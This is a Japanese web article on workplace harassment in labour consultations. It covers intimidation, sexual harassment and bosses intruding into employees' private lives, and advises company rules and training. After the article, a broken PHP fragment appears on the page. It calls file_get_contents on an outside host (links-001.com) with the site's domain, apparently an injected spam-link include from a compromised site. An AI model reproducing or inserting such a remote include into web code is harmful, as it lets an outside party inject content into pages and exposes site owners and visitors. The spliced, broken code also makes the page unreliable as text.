前へ
次へ

労働相談の内容は年々変わってきている

労働相談で多くなっているのがパワハラなどの職場トラブルになり、昔は当たり前であったことまで人権的な価値が変ったことによって問題となります。
特に男性は女性に対するパワハラだけではなくセクハラなども視野に入れて考えていかなくては、時代遅れの企業となってしまう恐れがあります。
社員一人ひとりに価値観を植え付けることは、自分だけではなく職場トラブルが無くなるようにするための方法といえます。
パワハラといわれるのは仕事ができなかったり失敗をしたときに「恫喝」をしてしまう場合があり、これをやってしまうと相手に対して恐怖を植えつけることになります。
自分ではそんなつもりがないと昔はそんなことは無かったといったとしても、時代が変り恫喝に値する行為をしてしまうとパワハラになります。
これらを上手に回避するためには社内ルールを設けることや人材教育を徹底してやっていくことにありますので、コミュニケーション能力と一緒に考えることで解決します。
今ではスマートフォンやパソコンからメールなど気軽にできるようになったことで、社内関係ではプライベートなことまで聞くことが横行するところもあります。
しかしこの関係は仕事は仕事、プライベートはプライベートとして分けて考えなくてはいけないので、上司が部下のメールアドレスを聞いてプライベートに介入することもパワハラになります。
男性上司から女性社員であれば、セクハラといわれても仕方の無いことになりますので、労働相談でも広く扱われるようになっている事案です。
プライベートの介入は休日のことではなく就業時間が終わった後にも関係してるため、飲みに行くことを無理強いしたり、コミュニケーションが取れないということをいわないことです。
こちらも強要しているパワハラになりますので本人の自由にしてあげることは、とても有意義な社会性を持っている会社だということがわかります。
防止するための積極的な活動は社会性を高めることになり、多くの働きやすい環境を作ることに繋がります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top